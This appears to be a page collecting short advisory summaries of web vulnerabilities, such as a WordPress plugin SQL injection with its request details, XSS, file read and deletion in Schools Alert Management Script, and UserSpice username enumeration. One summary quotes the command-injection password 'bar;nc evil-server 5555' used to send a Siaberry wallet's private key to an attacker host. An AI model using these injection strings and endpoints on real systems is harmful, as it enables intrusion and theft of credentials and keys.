The easiest way to reproduce the SQL injection vulnerability is to visit the provided URL while being logged in as administrator or another user that is authorized to access the plugin settings page. Users that do not have full administrative privileges could abuse the database access the vulnerability provides to either escalate their privileges or obtain and modify database contents they were not supposed to be able to. Vulnerable Function: $wpdb->get_row(), Vulnerable Variable: $_POST['entry_id'], Vulnerable URL: http://vulnerablesite.com/wp-admin/admin-ajax.php, Vulnerable POST body: entry_id=ExploitCodeHere&_wpnonce=xxx&action=ufbl_get_entry_detail_action
The easiest way to reproduce the vulnerabilities is to visit the provided URL while being logged in as administrator or another user that is authorized to access the plugin settings page. Users that do not have full administrative privileges could abuse the database access the vulnerabilities provide to either escalate their privileges or obtain and modify database contents they were not supposed to be able to. Due to the missing nonce token, the vulnerable code is also directly exposed to attack vectors such as Cross Site request forgery (CSRF).
Permission checks for tasks were incomplete with regards to folder-to-object association. Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Siaberry took untrusted input directly from an HTTP POST request and immediately executed it in the shell. An attacker can extract the private key from the victim’s Sia wallet simply by entering a particular password on Siaberry’s login page. The problem occurred in ActionPage.php, where the attacker created an attack server called evil-server and used foo as the username and bar;nc evil-server 5555 as the password. This caused the following command to be executed on the Siaberry device: sudo bin/checker foo bar;nc evil-server 5555. When the victim entered the malicious password, the private key was sent to the attack server, where it was captured.
This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful, it could lead to application crash, resulting in denial of service.
The Schools Alert Management Script is vulnerable to an arbitrary file read vulnerability. An attacker can exploit this vulnerability by sending a crafted request to the img.php file with a malicious file path. This will allow the attacker to read any file on the server.
An SQL injection vulnerability exists in Schools Alert Management Script, which allows an attacker to execute arbitrary SQL commands via the 'get_sec.php' script. The vulnerability is due to insufficient sanitization of user-supplied input to the 'q' parameter. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames, passwords, and other sensitive data stored in the database.
This exploit allows attackers to enumerate usernames of the UserSpice 4.3.24 application. The exploit is done by sending a POST request to the existingUsernameCheck.php page with the username as a parameter. If the response contains the word 'taken', then the username is valid.
UserSpice 4.3.24 is vulnerable to Cross-Site Scripting (XSS) via the X-Forwarded-For header. An attacker can send a malicious payload to the server which will get executed when an admin visits the audit log page.
Attackers can delete any file through parameter 'img' with '../' by exploiting the vulnerability in Schools Alert Management Script.
Services By CQR